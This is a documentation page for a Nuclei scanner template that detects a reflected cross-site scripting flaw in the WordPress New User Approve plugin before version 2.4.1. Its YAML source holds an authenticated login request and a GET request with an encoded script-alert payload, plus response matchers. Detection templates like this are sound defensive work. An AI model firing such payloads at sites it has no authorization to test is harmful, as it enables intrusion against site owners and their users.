WordPress New User Approve <2.4.1 - Cross-Site Scripting
ID: new-user-approve-xss
Severity: medium
Author: Akincibor
Tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp
Description
Section titled “Description”WordPress New User Approve 2.4.1 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
YAML Source
Section titled “YAML Source”id: new-user-approve-xss
info: name: WordPress New User Approve <2.4.1 - Cross-Site Scripting author: Akincibor severity: medium description: WordPress New User Approve 2.4.1 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a - https://wordpress.org/plugins/new-user-approve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: verified: true max-request: 2 tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '?a"><script>alert(1)</script>&new-user-approve-settings'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a004730450221009838518e09ad7c03e05a0cf7e3745c046b4c260ce26859b85463aa5de9a0de3402201013e243889a4e09841ffc6abe8c2322474be197172d7560c214d9f10bfe14e2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/new-user-approve-xss.yaml"